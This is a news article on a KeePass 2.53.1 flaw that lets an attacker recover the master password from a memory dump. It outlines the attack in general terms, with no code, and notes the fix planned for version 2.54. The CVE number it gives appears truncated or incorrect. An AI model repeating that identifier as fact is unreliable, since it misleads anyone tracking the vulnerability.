Vulnerability in KeePass allows attackers to extract the master password from the application’s memory

Popular password manager KeePass is vulnerable to a vulnerability that allows the master password to be retrieved from the application’s memory. This means that attackers who gain access to the device can find out the password even if the database is locked.

The existence of the vulnerability was reported by a security researcher under the pseudonym “vdohney”, who also published a tool to demonstrate the attack. With this tool, you can recover the master password in plain text, with the exception of the first character, which can be guessed fairly quickly.

Password managers allow users to create unique passwords for each online account and store them in an encrypted database. To access it, you need to know only one master password, which should not be shared with anyone.

However, the new vulnerability KeePass that got the number CVE-2023-3278 , makes it possible to crack the master password. The problem is that the program uses a special element for entering the password, which leaves a trace of each typed character in the application’s memory.

“KeePass Master Password Dumper is a simple attack demonstration tool that extracts the master password from KeePass memory. Other than the first character of the password, it almost completely recovers it in plain text,” warns the researcher on the tool’s page on GitHub.

To exploit the vulnerability, you need to get a memory dump of the KeePass process. This can be done by physically accessing the device or by infecting it with malware. The memory dump and KeePass database are then sent to the attacker to extract the password.

The vulnerability affects the latest version of KeePass 2.53.1 and probably all projects based on it. Only KeePass 1.X, KeePassXC and Strongbox are not affected by this vulnerability.

Dominik Reichl, the developer of KeePass, received a report about the vulnerability in advance and promised to release a fix for CVE-2023-3278 in version 2.54. With the release of the update, users will no longer have to worry about this vulnerability.

However, for the best protection, you should be especially careful when downloading programs from untrusted sites and beware of phishing attacks that can infect your device and possibly harm your data in some other way.